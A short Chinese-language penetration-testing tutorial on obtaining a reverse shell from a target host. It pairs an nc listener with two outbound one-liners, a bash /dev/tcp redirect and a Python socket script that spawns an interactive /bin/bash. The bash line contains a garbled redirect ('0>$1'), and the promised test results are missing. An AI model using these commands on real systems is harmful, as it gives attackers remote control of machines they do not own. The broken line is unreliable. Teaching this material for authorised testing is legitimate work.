在滲透測試過程中我們需要把測試目標的shell反彈到我們的主機中,方便測試。比如在測試到命令注入時,可以反彈shell進行進一步測試。
一、nc和bash
在我們的主機上執行 nc -lvp port
表示顯示執行過程監聽端口
在目標主機上執行 bash -i >& /dev/tcp/ip/port 0>$1
這樣就可以在我們的主機上執行命令了
二、nc和python
在我們的主機上執行 nc -lvp port
表示顯示執行過程監聽端口
服務端執行以下命令
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
注意修改ip和port爲主機的ip和端口
測試效果如下